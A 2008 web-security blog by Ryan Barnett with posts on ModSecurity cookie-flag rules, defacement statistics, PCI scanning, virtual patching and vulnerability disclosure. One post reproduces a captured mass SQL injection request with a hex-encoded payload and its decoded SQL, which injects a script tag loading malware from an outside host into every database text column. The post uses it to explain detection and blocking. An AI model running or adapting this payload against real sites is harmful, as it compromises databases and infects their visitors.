Monday, December 22, 2008

Fixing Both Missing HTTPOnly and Secure Cookie Flags

Submitted by Ryan Barnett 12/22/2008

In a previous post I showed how you can use both ModSecurity and Apache together to identify/modify SessionIDs that are missing the HTTPOnly flag. I received some feedback where people were asking how to accomplish the same thing but for the "Secure" cookie flag which instructs the browser to *only* send the SessionID back over an SSL connection.
If you are only interested in addressing the missing "Secure" cookie flag, then you can simply take the example from the previous post and edit it slightly to swap out "httponly" with "secure". If, however, you want to try and address both of these issues together, then you will need to change the rule set approach a bit so that it works correctly. This is because there are now three different scenarios you have to account for -
  • Missing HTTPOnly flag
  • Missing Secure flag (if the SessionID is being sent over an SSL connection)
  • Missing both HTTPOnly and Secure flags

With this in mind, here is an updated rule set that will handle both missing HTTPOnly and Secure cookie flags.

#
# First we want to capture Set-Cookie SessionID data for later inspection
SecRule RESPONSE_HEADERS:/Set-Cookie2?/ "(?i:(j?sessionid|(php)?sessid|(asp|jserv|jw)?session[-_]?(id)?|cf(id|token)|sid))" "phase:3,t:none,pass,nolog,setvar:tx.sessionid=%{matched_var}"

#
# We now check the saved SessionID data for the HTTPOnly flag and set an Apache
# ENV variable if it is missing.
SecRule TX:SESSIONID "!(?i:\;? ?httponly;?)" "phase:3,t:none,setenv:httponly_cookie=%{matched_var},pass,log,auditlog,msg:'AppDefect: Missing HttpOnly Cookie Flag.'"

#
# Next we check the saved SessionID data for the Secure flag (if this is an SSL session)
# and set an Apache ENV variable if it is missing.
SecRule SERVER_PORT "@streq 443" "chain,phase:3,t:none,pass,log,auditlog,msg:'AppDefect: Missing Secure Cookie Flag.'"
SecRule TX:SESSIONID "!(?i:\;? ?secure;?)" "t:none,setenv:secure_cookie=%{matched_var}"

#
# The final check is to see if BOTH of the HTTPOnly and Secure cookie flags are missing
# and set an Apache ENV variable if they are missing.
SecRule TX:SESSIONID "!(?i:\;? ?httponly;?)" "chain,phase:3,t:none,pass,log,auditlog,msg:'AppDefect: Missing HttpOnly and Secure Cookie Flag.'"
SecRule SERVER_PORT "@streq 443" "chain,t:none"
SecRule TX:SESSIONID "!(?i:\;? ?secure;?)" "t:none,setenv:secure_httponly_cookie=%{matched_var}"

#
# This last section executes the Apache Header command to
# add the appropriate Cookie flags
Header set Set-Cookie "%{httponly_cookie}e; HTTPOnly" env=httponly_cookie
Header set Set-Cookie "%{secure_cookie}e; Secure" env=secure_cookie
Header set Set-Cookie "%{secure_httponly_cookie}e; Secure; HTTPOnly" env=secure_httponly_cookie

These rules will both alert and fix these cookie issues. You may want to switch the actions to "nolog" so that you are not flooded with alerts.
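For readers who want to verify the logic outside of Apache, here is a minimal Python sketch of the same three-scenario decision table. It is an illustration only - the function names are mine, and the real work is done by the ModSecurity rules and Header directives above.

```python
# Illustrative sketch of the rule set's decision logic (not the real
# ModSecurity/Apache mechanism; function names are hypothetical).

def missing_flags(set_cookie, is_ssl):
    """Return the cookie flags that the rule set would need to append."""
    attrs = [a.strip().lower() for a in set_cookie.split(";")[1:]]
    flags = []
    if "httponly" not in attrs:
        flags.append("HttpOnly")
    if is_ssl and "secure" not in attrs:  # Secure only matters on SSL
        flags.append("Secure")
    return flags

def fix_cookie(set_cookie, is_ssl):
    """Mimic the Apache Header rewrite: re-emit the cookie with the flags added."""
    return "; ".join([set_cookie] + missing_flags(set_cookie, is_ssl))

print(fix_cookie("JSESSIONID=abc123", True))
# JSESSIONID=abc123; HttpOnly; Secure
```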

Friday, December 19, 2008

Helping Protect Cookies with HTTPOnly Flag

Submitted by Ryan Barnett 12/19/2008

If you are unfamiliar with what the HTTPOnly cookie flag is or why your web apps should use it, please refer to the following resources -

The bottom line is this - while this cookie option flag does absolutely nothing to prevent XSS attacks, it does significantly help to prevent the #1 XSS attack goal, which is stealing SessionIDs. While HTTPOnly is not a "silver bullet" by any means, the potential ROI of implementing it is quite large. Notice I said "potential," as in order to provide the intended protections, two key players have to work together -

  • Web Applications - whose job it is to append the "HTTPOnly" flag onto all Set-Cookie response headers for SessionIDs, and
  • Web Browsers - whose job it is to identify and enforce the security restrictions on the cookie data so that javascript can not access the contents.

The current challenge to realizing the security benefit of the HTTPOnly flag is that universal adoption in both web apps and browsers is still not there. Depending on your web app platform, you may not have an easy mechanism for implementing this feature. For example, in Java you could follow the example provided here on the OWASP site - http://www.owasp.org/index.php/HTTPOnly#Using_Java_to_Set_HTTPOnly - however, this doesn't work well for the JSESSIONID as it is added by the framework. Jim Manico has been fighting the good fight to try and get the Apache Tomcat developers to implement his patch to add in HTTPOnly support - http://manicode.blogspot.com/2008/08/httponly-in-tomcat-almost.html. The point is that with so many different web app development platforms, it isn't going to be easy to find support for this within every web app that you have to secure...

As for browsers - they too have sporadic, inconsistent adoption of HTTPOnly. It was for this reason that the OWASP Intrinsic Security group started an RFC spec for HTTPOnly - http://groups.google.com/group/ietf-httponly-wg. Hopefully this group will get some traction with the various browser developers.

So, at this point you might be asking yourself - Ryan, that is interesting news and all, but what can a web application firewall do to help with this issue? I would then in turn reply - Great question, I am glad that you asked. ;)

One of my pet peeves with the web application security space is the stigma that is associated with a WAF. Most everyone focuses only on the negative security and attack-blocking aspects of the typical WAF deployment, and they fail to realize that WAFs are a highly specialized tool for HTTP. Depending on your circumstances, you may not ever intend to do blocking. There are many other use-cases for WAFs - in this case, as a tactical response tool to help address an underlying vulnerability. Here, we could monitor when back-end/protected web applications are handing out SessionIDs that are missing the HTTPOnly flag. This could raise an alert notifying the proper personnel so they can see if editing the web language code to add this feature is possible. A rule to do this with ModSecurity would look like this -

# Identifies SessionIDs without HTTPOnly flag
#
SecRule RESPONSE_HEADERS:/Set-Cookie2?/ "!(?i:\;? ?httponly;?)" "chain,phase:3,t:none,pass,log,auditlog,msg:'AppDefect: Missing HttpOnly Cookie Flag.'"
SecRule MATCHED_VAR "(?i:(j?sessionid|(php)?sessid|(asp|jserv|jw)?session[-_]?(id)?|cf(id|token)|sid))" "t:none"

While this rule is pretty useful for identifying and alerting on the issue, many organizations would like to take the next step and try to fix the issue. If the web application does not have a way to add in the HTTPOnly cookie flag option internally, you can actually leverage ModSecurity+Apache for this purpose. ModSecurity has the ability to set environment data that Apache reads/acts upon. In this case, we can modify our previous rule slightly to use the "setenv" action and then add an additional Apache "Header" directive that will overwrite the data with new Set-Cookie data that includes the HTTPOnly flag -

# Identifies SessionIDs without HTTPOnly flag and sets the "http_cookie" ENV
# Token for Apache to read
SecRule RESPONSE_HEADERS:/Set-Cookie2?/ "!(?i:\;? ?httponly;?)" "chain,phase:3,t:none,pass,nolog"
SecRule MATCHED_VAR "(?i:(j?sessionid|(php)?sessid|(asp|jserv|jw)?session[-_]?(id)?|cf(id|token)|sid))" "t:none,setenv:http_cookie=%{matched_var}"

# Now we use the Apache Header directive to set the new data
Header set Set-Cookie "%{http_cookie}e; HTTPOnly" env=http_cookie

The end result of this ruleset is that ModSecurity+Apache can transparently add on the HTTPOnly cookie flag on the fly to any Set-Cookie data that you define. Thanks goes to Brian Rectanus from Breach for working with me to get the Header directive syntax correct.
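If you want to sanity-check the detection half of these rules outside of ModSecurity, the chained logic can be approximated in a few lines of Python. The session-ID pattern below mirrors the one in the rule; the helper function name is hypothetical.

```python
import re

# Mirrors the rule's session-ID name pattern and the missing-HttpOnly check.
SESSION_NAME = re.compile(
    r"(?i)(j?sessionid|(php)?sessid|(asp|jserv|jw)?session[-_]?(id)?|cf(id|token)|sid)")

def is_defective(set_cookie_header):
    """True when the cookie looks like a SessionID but lacks the HttpOnly flag."""
    name = set_cookie_header.split("=", 1)[0]
    return (SESSION_NAME.search(name) is not None
            and re.search(r"(?i)httponly", set_cookie_header) is None)

print(is_defective("PHPSESSID=xyz; path=/"))            # True
print(is_defective("PHPSESSID=xyz; path=/; HttpOnly"))  # False
```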

Hopefully the data presented here will help people who would like to have the security benefit of this flag but are running into challenges implementing it within the app.

Friday, August 29, 2008

Lessons Learned from Zone-H Statistics Reports

Submitted by Ryan Barnett 8/29/2008

I may be in the minority by stating the following, however, I believe that web defacements are a serious problem and are a critical barometer for estimating exploitable vulnerabilities in websites. Defacement statistics are valuable as they are one of the few incidents that are publicly facing and thus can not easily be swept under the rug.

The reason why I feel in the minority with this concept is that most people focus too much on the impact or outcome of these attacks (the defacement) rather than the fact that their web applications are vulnerable to this level of exploitation. People are forgetting the standard Risk equation -
RISK = THREAT x VULNERABILITY x IMPACT


The resulting risk of a web defacement might be low because the impact may not be deemed a high enough severity for particular organizations. What most people are missing, however, is that the threat and vulnerability components of the equation still exist. What happens if the defacers decided to not simply alter some homepage content and instead decided to do something more damaging? This is exactly what I believe is starting to happen. More on that later.

Zone-H Statistics Report for 2005-2007
Zone-H is a clearing house that has been tracking web defacements for a number of years. In March of 2008, they released a statistics report which correlated data from a three-year window, 2005-2007. This report revealed some very interesting numbers.

What Attacks Were Being Used?
The first piece of data that was interesting to me was the table which listed the various attacks that were successfully employed which resulted in enough system access to alter the web site content.

Attack Method | Total 2005 | Total 2006 | Total 2007
--- | --- | --- | ---
Attack against the administrator/user (password stealing/sniffing) | 48.006 | 207.323 | 141.660
Shares misconfiguration | 39.020 | 36.529 | 67.437
File Inclusion | 118.395 | 148.082 | 61.011
SQL Injection | 36.253 | 47.212 | 35.407
Access credentials through Man In the Middle attack | 20.427 | 21.209 | 28.046
Other Web Application bug | 50.383 | 6.529 | 18.048
FTP Server intrusion | 58.945 | 55.611 | 17.023
Web Server intrusion | 38.975 | 30.059 | 13.405
DNS attack through cache poisoning | 7.541 | 9.131 | 9.747
Other Server intrusion | 1.473 | 216.050 | 8.050
DNS attack through social engineering | 4.719 | 5.959 | 7.585
URL Poisoning | 2.897 | 7.988 | 6.931
Web Server external module intrusion | 8.487 | 17.290 | 6.690
Remote administrative panel access through bruteforcing | 2.738 | 4.988 | 6.607
Rerouting after attacking the Firewall | 988 | 4.308 | 6.127
SSH Server intrusion | 2.644 | 14.746 | 5.723
RPC Server intrusion | 1.821 | 5.793 | 5.516
Rerouting after attacking the Router | 1.520 | 4.867 | 5.257
Remote service password guessing | 939 | 7.008 | 5.105
Telnet Server intrusion | 1.863 | 6.252 | 4.753
Remote administrative panel access through password guessing | 1.014 | 4.416 | 4.753
Remote administrative panel access through social engineering | 780 | 5.472 | 3.127
Remote service password bruteforce | 3.576 | 4.018 | 3.125
Mail Server intrusion | 1.198 | 4.195 | 1.315
Not available | 11.382 | 37.243 | 9.724

(Counts use European-style thousands separators, as in the original Zone-H report.)

Lesson Learned #1 - Web Security Goes Beyond Securing the Web Application Itself
The first concept that was reinforced was the fact that the majority of attack vectors had absolutely nothing at all to do with the web application itself. The attackers exploited other services that were installed (such as FTP or SSH) or even used DNS cache poisoning, which would give the "illusion" that the real website had been defaced. These defacement statistics should be a wake-up call for organizations to truly embrace defense-in-depth security and re-evaluate their network and host-level security posture.

Lesson Learned #2 - Vulnerability Statistics Don't Directly Equate to Attack Vectors used in Compromises
There are many community projects and resources available that track web vulnerabilities, such as Bugtraq, CVE and OSVDB. These are tremendously useful tools for gauging the raw numbers of vulnerabilities that exist in public and commercial web software. Additionally, projects such as the WASC Web Application Security Statistics Project or the statistics recently released by Whitehat Security provide further information about vulnerabilities that are remotely exploitable in both public and custom code applications. All of this data helps to define both the overall attack surface available to attackers and the Vulnerability component of the RISK equation mentioned earlier. This information shows what COULD be exploited; however, there must be a threat (attacker) and a desired outcome (such as a website defacement).

If an organization wants to prioritize which vulnerabilities they should address first, one way to do this would be to identify the actual vulnerabilities that are being exploited in real incidents. The data presented in the Zone-H reports helps to shed light on this area. Additionally, the WASC Web Hacking Incidents Database (WHID) also includes similar data, however it is solely focused on web application-specific attack vectors.


Incident by attack method


You may notice, for example, that although XSS is currently the #1 most common vulnerability present in web applications, it is not the most often used attack vector. That distinction goes to SQL Injection. This makes sense if you think about this from the attacker's perspective. Which is easier -
  • Option #1
    • Identify an XSS vulnerability within a target website
    • Send the XSS code to the site
    • Either wait for a client to access the page you have infected or alternatively try and entice someone to click on a link on another site or in an email
    • Hopefully your XSS code was able to grab the victim's session ID and send it to your cookie trap URL
    • You then need to quickly use that session id to try and log into the victim's account.
    • You can then try and steal sensitive info
  • Option #2
    • Identify an SQL Injection vector in the web app
    • Send various injection variants until you fine tune it
    • Extract out the customer data directly from the back-end DB table
Option #2 is obviously much easier as it cuts out the middle-man (the client) and goes directly through the web app to get to the desired data. What I am seeing in the field in working with Breach Security customers is that attackers are focusing more and more on criminal activities that in some way, shape or form will help them to get money. As Rod Tidwell so eloquently put it in the movie Jerry Maguire - Show Me The Money!

Lesson Learned #3 - Web Defacers Are Migrating To Installing Malicious Code
In keeping with the monetary theme from the previous section, another interesting trend is emerging with regards to web defacements. In all of the previous Zone-H reports, there was always a steady increase in the number of yearly defacements averaging ~30%/year. In 2007, however, they noticed a significant 37% decrease going from 752,361 in 2006 to 480,905. Obviously the number of targets is not going down and the overall state of web application security is pretty poor, so what could account for the decrease in numbers?

It is my estimation that the professional criminal elements of cyberspace (Russian Business Network, etc...) have recruited web defacers into doing "contract" work. Essentially, the web defacers already have access to systems, so they have a service to offer. It used to be that the web site data itself was the only thing of value; however, now we are seeing that using legitimate websites as a malware hosting platform is providing massive scale improvements for infecting users. So, instead of overtly altering website content and proclaiming their 3l33t hzx0r ski77z to the world, they are quietly adding malicious javascript code to the sites and are making money from criminal organizations and/or malware advertisers by infecting home computer users.

Take a look at the following chart from the WHID Report -

Attack Goal | %
--- | ---
Stealing Sensitive Information | 42%
Defacement | 23%
Planting Malware | 15%
Unknown | 8%
Deceit | 3%
Blackmail | 3%
Link Spam | 3%
Worm | 1%
Phishing | 1%
Information Warfare | 1%




Incident by outcome

You can see that Defacements account for 23% while Planting Malware is right behind it at 15%. It is my opinion that the majority of people who are executing defacements will continue to migrate over and start installing malware in order to make money. This is one of the only plausible explanations that I have to account for the dramatic decrease in the number of defacements.

What is somewhat humorous about this trend is that I actually mentioned the concept of defacers making "non-apparent" changes to site content in my Preventing Web Site Defacements presentation way back in 2000. Looks like I was about 8 years ahead of the curve on that one :)

Wednesday, August 27, 2008

More PCI Confusion: How Should WAFs Handle ASV Traffic?

Submitted by Ryan Barnett 8/27/2008

I have previously discussed the importance of sharing data between code reviews, vulnerability scanning and web applications firewalls. The main issue being that these three processes/tools are usually run by three different business units - development, information security and operations staff - and they don't all share their output data with each other. The issue of sharing output data, however, is putting the cart before the horse. When looking at vulnerability scanning, you need to first decide what the goal of scanning is and then you can select the appropriate WAF configuration for handling the traffic.

What is the ASV Scanning Goal?
There seem to be two different goals that ASVs may have for scanning: 1) to identify all vulnerabilities within a target web application, or 2) to identify all vulnerabilities within a target web application that are remotely exploitable by an external attacker. You may want to read that again to make sure that you understand the difference, as this is the point that I will be discussing for the remainder of this post.

Identifying Underlying Vulnerabilities
This is a critical goal to have when scanning. If you can identify all of the existing vulnerabilities, or at least those which can be identified by scanning, you can then formulate a remediation plan to address the issue at the root cause. Remediation should include both source code fixes and custom rules within a WAF for protection in the interim.

WAF Event Management
From a WAF administration perspective, it is important to have a proper configuration that allows for the vulnerability scanning goal while simultaneously not flooding the alert interfaces with thousands of events from ASV traffic. This traffic may both impact the overall performance of the WAF and skew reporting outputs that include raw attack data.

Option #1 - Whitelist the ASV Network Range
In order to identify all of the actual vulnerabilities, you will need to allow the ASV to interact completely with the back-end web application.

Pro(s)
  • Identification of vulnerabilities and information leakages within the web application
  • From a WAF event management perspective, this configuration will eliminate alerts generated by the scans
Con(s)
  • Reduces the true accuracy of the scans as it does not simulate what a “normal” attacker would be able to access since the WAF is not blocking inbound attacks and outbound information leakages such as SQL Injection error messages which attackers use to fine tune their attacks.
  • PCI QSAs may interpret these scan results in a negative way if the WAF blocking aspect is not considered as a compensating control in Requirement 6.6.
Option #2 - Treat ASV Traffic Like Any Other Client
Pro(s)
  • Gives a truer picture of what an attacker would/wouldn’t be able to exploit since the WAF is providing its normal protections.
Cons(s)
  • Vulnerabilities within the web application may not be identified and therefore are not being remediated through other means.
  • This configuration will generate tons of alerts especially if the scan frequency is high (daily).
Option #3 - Run Before and After Scans
If you coordinate with your ASV, you could conduct 2 different scans – one when the ASV range is whitelisted and one without.

Pro(s)
  • It allows for the identification of vulnerabilities.
  • This is advantageous as it shows the immediate ROI of a WAF as a compensating control for PCI.
Con(s)
  • If you take this approach, you need to make sure that your QSA knows about both scan runs and does NOT only look at the whitelisted scan data.
Option #4 - Use a Block but Don't Log Configuration for ASVs
One other option you might want to consider is a "block but don't log" configuration, which is a hybrid approach suitable for day to day use. With this setup, you allow the WAF to block requests/responses when it sees attacks, but it will then inspect the IP address range and, if the traffic is coming from an ASV, it will not generate alerts. To me, this is the best approach for day to day scanning, as anything that pops up in the ASV scan reports is something that the WAF did not block and should be addressed.
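As a rough sketch, the hybrid policy boils down to a two-part decision per request. The address range and function below are hypothetical illustrations, not a real WAF API - substitute your scanner's actual range.

```python
import ipaddress

# Hypothetical example range for the ASV; substitute your scanner's real range.
ASV_RANGE = ipaddress.ip_network("198.51.100.0/24")

def waf_decision(client_ip, is_attack):
    """Return (block, alert): always block attacks, but suppress alerts for ASV scans."""
    if not is_attack:
        return (False, False)
    from_asv = ipaddress.ip_address(client_ip) in ASV_RANGE
    return (True, not from_asv)

print(waf_decision("198.51.100.7", True))  # (True, False) - blocked, no alert
print(waf_decision("203.0.113.9", True))   # (True, True)  - blocked and logged
```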

Some ASVs Are Arguing That a WAF Shouldn't Ever Block Them
I have run into an interesting webappsec scenario while presenting on PCI at conferences (such as the recent SANS What Works in Web Application Security Summit in Vegas). The attendees have started complaining that many ASVs are requiring that organizations only use the whitelist approach so that the vulnerability scans will pass directly through the WAF and interact with the back-end web application unencumbered. The ASVs are citing the following section in the PCI Security Scanning Procedures document -

13. Arrangements must be made to configure the intrusion detection system/intrusion prevention system (IDS/IPS) to accept the originating IP address of the ASV. If this is not possible, the scan should be originated in a location that prevents IDS/IPS interference

Obviously, these ASVs are lumping WAFs in with network IDS/IPS devices in this context. In reading this section, it seems to me that the real intent of this setting is that organizations should not "cheat" and configure these devices to automatically block or disrupt (with TCP Resets) connections coming from the ASV range based SOLELY on the IP address. This would not allow the scanning to inspect the site at all. Basically you can not blacklist the ASV IP range. This makes sense as this configuration would make the vulnerability scan reports come up clean but it would not be a realistic picture of what a real attacker would be able to access.

What About VA + WAF Integration?

What is frustrating with this whitelisting hard-line stance is that this approach effectively negates the valuable Vulnerability Assessment + WAF integration efforts that have recently appeared - most notably between Breach and Whitehat Security. If a WAF is not allowed to block requests coming from an ASV, then how are the ASV reports ever going to show that the issues have been remediated by a virtual patch?

Look at the following sections for PCI Requirement 11.2

11.2 Run internal and external network vulnerability scans at least quarterly and after any significant change in the network (such as new system component installations, changes in network topology, firewall rule modifications, product upgrades).

Note: Quarterly external vulnerability scans must be performed by a scan vendor qualified by the payment card industry. Scans conducted after network changes may be performed by the company’s internal staff.

11.2.a Inspect output from the most recent four quarters of network, host, and application vulnerability scans to verify that periodic security testing of the devices within the cardholder environment occurs.

Verify that the scan process includes rescans until “clean” results are obtained


11.2.b To verify that external scanning is occurring on a quarterly basis in accordance with the PCI Security Scanning Procedures, inspect output from the four most recent quarters of external vulnerability scans to verify that

• Four quarterly scans occurred in the most recent 12-month period

• The results of each scan satisfy the PCI Security Scanning Procedures (for example, no urgent, critical, or high vulnerabilities)

• The scans were completed by a vendor approved to perform the PCI Security Scanning Procedures

Notice the bolded sections. The problem that organizations are encountering is that if they do indeed whitelist the ASV IP addresses, then the resulting scan reports will show vulnerabilities that a real attacker would most likely not be able to exploit, because the WAF would be in blocking mode for them or they have implemented a virtual patch. So, if a QSA looks at the ASV scans and sees a bunch of urgent/critical/high vulns (SQL Injection, XSS, etc…) then the organization may fail this section. :(

Clarifications Needed

I believe that the PCI Security Council needs to update the text in the ASV Scanning Procedures guide to make it clearer how WAFs should be configured in relation to PCI scanning. At the very least, they should clarify the original intent of that text (as I stated previously, I believe it was to prevent sites from blacklisting the ASV address ranges).

I am interested in hearing people's experiences with this situation. What have ASVs told you? How do you configure your WAFs to handle ASV traffic?

Tuesday, August 26, 2008

Mass SQL Injection Attacks Now Targeting PHP Sites

Submitted by Ryan Barnett 8/26/2008

As most of you already have heard, or have faced yourselves, the mass SQL Injection attacks are still going strong on the web - Mass SQL Attack a Wake-up Call for Developers.

The Game Has Changed
Previously, criminals had a tough time creating scripts that would mass exploit web applications. This was mainly due to websites running custom coded apps - no two sites were the same. Attackers didn't have access to the target code, so if they wanted to extract customer credit card data from a back-end database, they were forced to run manual reconnaissance probes to enumerate the database structure and naming conventions. This manual probing offered defenders time to identify and react to attacks before a successful compromise of customer data.

Now, these SQL Injection scripts can generically inject data into any vulnerable site without prior knowledge of the database structure. They accomplish this by using multiple SQL commands to essentially create a script that will generically gather and then loop through all table names and append some malicious javascript that points to malware on a 3rd party site.

A "skeleton key" attack if you will. Brutal...

The attacks have mainly been targeting IIS/ASP/MS-SQL sites up to this point. For example, I recently received this attack log from a ModSecurity user which shows the SQL Injection payload -
GET /somedir/somfile.asp?arg1=SOMETHING;DECLARE%20@S%20
VARCHAR(4000);SET%20@S=CAST(0x4445434c41524520405420
5641524348415228323535292c4043205641524348415228323535
29204445434c415245205461626c655f437572736f722043555253
4f5220464f522053454c45435420612e6e616d652c622e6e616d652
046524f4d207379736f626a6563747320612c737973636f6c756d6
e73206220574845524520612e69643d622e696420414e4420612e
78747970653d27752720414e442028622e78747970653d393920
4f5220622e78747970653d3335204f5220622e78747970653d323
331204f5220622e78747970653d31363729204f50454e205461626
c655f437572736f72204645544348204e4558542046524f4d20546
1626c655f437572736f7220494e544f2040542c4043205748494c4
528404046455443485f5354415455533d302920424547494e20455
845432827555044415445205b272b40542b275d20534554205b27
2b40432b275d3d525452494d28434f4e56455254285641524348415
22834303030292c5b272b40432b275d29292b27273c7363726970
74207372633d73646f2e313030306d672e636e2f63737273732f77
2e6a733e3c2f7363726970743e27272729204645544348204e4558
542046524f4d205461626c655f437572736f7220494e544f2040542
c404320454e4420434c4f5345205461626c655f437572736f722044
45414c4c4f43415445205461626c655f437572736f7220%20AS%20
VARCHAR(4000));EXEC(@S);-- HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, */*;q=0.1
Accept-Language: en-US
Accept-Encoding: deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)
Host: www.example.com
Connection: Close
If we decode the HEX encoded SQL data, we get this -
DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=sdo.1000mg.cn/csrss/w.js></script>''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
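Decoding such a payload yourself takes one line of Python - the string below is just the first few bytes of the hex blob from the log above:

```python
# First 23 bytes of the hex-encoded payload captured in the log above.
payload = "4445434c41524520405420564152434841522832353529"
decoded = bytes.fromhex(payload).decode("ascii")
print(decoded)  # DECLARE @T VARCHAR(255)
```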
Fortunately for this user, ModSecurity has rules that easily detected and blocked this attack.

The theory is that the SQL injection code could be updated to compromise other platforms such as PHP, etc... Well, I have been doing some research and I am finding evidence of PHP sites that have been infected. For example, if you do a Google search looking for PHP sites that have the same javascript code as the example that was sent to me, you will see that approximately 3,150 PHP sites are currently infected.
Technical Sidenote - what is interesting with these PHP sites is that even though their web applications are not filtering client input and their DB queries are not secure, they are actually able to prevent the goal of this attack since the PHP code is properly html encoding the output sent to the clients :)
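The sidenote in code form - assuming the PHP apps entity-encode their output the way Python's html.escape does, the planted tag reaches the browser as inert text rather than an executable script:

```python
import html

# The attacker's injected tag, as stored in the compromised database column.
injected = "<script src=sdo.1000mg.cn/csrss/w.js></script>"

# Output encoding at render time neutralizes it: the browser displays the
# escaped text instead of fetching and running the remote script.
print(html.escape(injected))
# &lt;script src=sdo.1000mg.cn/csrss/w.js&gt;&lt;/script&gt;
```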
What I am not sure of is whether the attack code itself has indeed changed (to target other back-end DBs) or if the victim site is using a PHP front-end with an MS-SQL back-end… If you have any logs of these attacks where they are targeting PHP pages (instead of ASP/ASPX), please share them with me or post them here.

Monday, August 25, 2008

On Your Marks, Get Set, Go: Vulnerability Mitigation Race

Submitted by Ryan Barnett 8/25/2008

Now that the 2008 Olympics have drawn to a close, I wanted to post this entry as the track and field events inspired this analogy.

In many ways vulnerability remediation is like a track and field race, and the firing of the starter's pistol is the public vulnerability announcement. The goal of the race is to be the first one to either exploit or patch a vulnerability. The participants in the race may include:

1) Organizations running the vulnerable application,

2) Attackers looking to exploit the vulnerability manually, and

3) The odds-on favorite to win the race - an automated worm program.

Organizations looking to mitigate or patch their systems are the long-shots to win this race. Let's look at a breakdown of the challenges that organizations face:

Not Hearing the Starter's Pistol

Unfortunately, many organizations don't realize that they are even in a race! This can be attributed to poor monitoring of vulnerability alerts. If you aren't signed up on your vendor's mail-list or you don't have someone checking US-CERT or the SANS Internet Storm Center (ISC) daily, then you are immediately giving the attackers a 50 yard lead in this race...

What Do You Mean We Don't Have The Baton?

If you are running in a relay race, you need to have a baton to pass to each member of your team. In this case, the baton is the vendor's security patch. You might be ready, willing and able to start the patching process; however, if the vendor doesn't release the patch, you can't really start the race, can you?

Not Getting A Clean Handoff

Each leg of the relay could be thought of as a step in the patching process, such as installation on a test host, then pushing the patch out to development, then regression testing and finally out to production. As each phase completes its tasks, it then needs to notify the next group and "hand off the baton" so they can move forward with testing. If this doesn't happen, then the patch will never make it to the finish line - which is when the patches are applied to production hosts. I can't tell you how many times I have seen customers who have patches that make it through one or two phases but then just seem to fall off the priority list.

Getting Disqualified

In a relay race, if you step outside of your lane, you can be disqualified. Similarly, if a security patch ever causes any sort of disruption to normal service, then the patch is usually not applied. If there are problems during regression testing, then odds are that the security patch will not make it to the finish line. In the end, functionality will always trump security.

Let's Not Pull A Hamstring

Many organizations want to minimize the risk of being disqualified, so they take a slow, methodical approach to the race and decide just to walk it. These are the organizations who only have quarterly downtime windows for patching. These companies may get a ribbon for participation, but they will never win the race.

Don't Have A Lane To Run In

What happens if you are not able to apply any patches at all to your web application? Two common scenarios are companies who have outsourced the development of their web application and companies running an older version of a COTS product for which the vendor is no longer providing patches. What options are left for these companies to compete in this race?

Evening The Odds

So, where does that leave us? Is there anything that organizations can do to even the playing field in this race? The answer is yes. Virtual patching can help by providing immediate mitigations for the vulnerability. If an organization implements a virtual patch on a web application firewall, it acts as a stop-gap measure to prevent remote exploitation of the vulnerability until the actual patch is applied. Using the relay race analogy again, this would be like forcing the attackers to run a steeplechase-type race, with water pits and 10 ft. hurdles in their lane, while you are allowed to run a normal race without any obstacles. In this type of scenario, you have a much better chance of beating the attackers to the finish line and protecting your web applications.
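As a rough sketch of what such a virtual patch might look like in the ModSecurity rules language (the URL and parameter name here are invented purely for illustration - substitute the details from your own vulnerability report):

```apache
# Hypothetical virtual patch: until the real code fix ships, require that
# the "id" parameter of /account/view be strictly numeric, blocking the
# SQL injection a scanner or advisory reported against it.
SecRule REQUEST_FILENAME "@streq /account/view" \
    "chain,phase:2,t:none,deny,status:403,log,auditlog,msg:'Virtual Patch: id must be numeric'"
SecRule ARGS:id "!^\d+$" "t:none"
```

The positive-security approach shown here (define what valid input looks like and deny everything else) is usually the safest form of virtual patch, since it does not depend on enumerating every possible attack payload.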

Wednesday, August 6, 2008

Microsoft and Oracle Helping "Time-to-Fix" Problems

Submitted by Ryan Barnett 8/6/2008

Before I talk to the title of this post, I have to provide a little back story. I have had an ongoing DRAFT blog post whose subject was basically a rant against the many vendors who are unwilling to offer vulnerability details. Every now and then I would review and update it a bit, but I never got to the point of actually posting it. I figured it wouldn't do much good in the grand scheme of things, and the mere act of updating it provided adequate cathartic relief, so a public post was not required. There have been some recent developments, however, that have allowed me to dust off my post and put a "kudos" spin on it :)

I have long been a proponent of providing options for people to mitigate identified vulnerabilities. We all realize that the traditional software patching process takes way too long to complete and push out into production, considering that the time it takes for the bad guys to create worm-able exploit code is usually measured in days. When you combine this with most vendors' vulnerability disclosure policies (which are essentially not to disclose any details), it is obvious that the bad guys have a distinct advantage in this particular arms race...

Ideally, all vulnerability researchers would work with the vendor, they would jointly release details along with patches, and customers would immediately implement them on production hosts. Unfortunately, reality is much different. Researchers often have their own agendas and decide to release vulnerability details on their own. In these cases, the end users have no mitigation options provided by the vendor and are thus exposed to attacks. In those situations where the researchers and the vendor do work together, the end user at least has a fix that they can apply. The problem is that the standard time-to-fix for organizations to test and install patches is usually a couple of months. So, the vendor has pushed the pig over the fence onto the customer and essentially takes an "it's your problem now" approach.

What would be useful would be some technical details on the vulnerabilities that are addressed within the patches. Let's take a look at Oracle's position on public disclosure. The fact that this is Oracle is irrelevant, as many vendors share this same view: they don't want to disclose any technical details of a vulnerability BEFORE patches are released. I really can't fault them for this stance, as they want to ensure that they have patches ready. What I am focusing on here is that once they have a patch set ready, they should provide enough technical details about the vulnerability so that an organization can implement some other mitigation options until the actual patches are installed. Unfortunately, the vendors' position is that they don't want to release the details, so as to prevent the bad guys from obtaining the info. What they are missing, however, is that both the good guys (Sourcefire, iDefense, etc...) and the bad guys are reverse engineering the vendors' patches to uncover the details of the vulnerability. The only people who don't have any details are the end users.

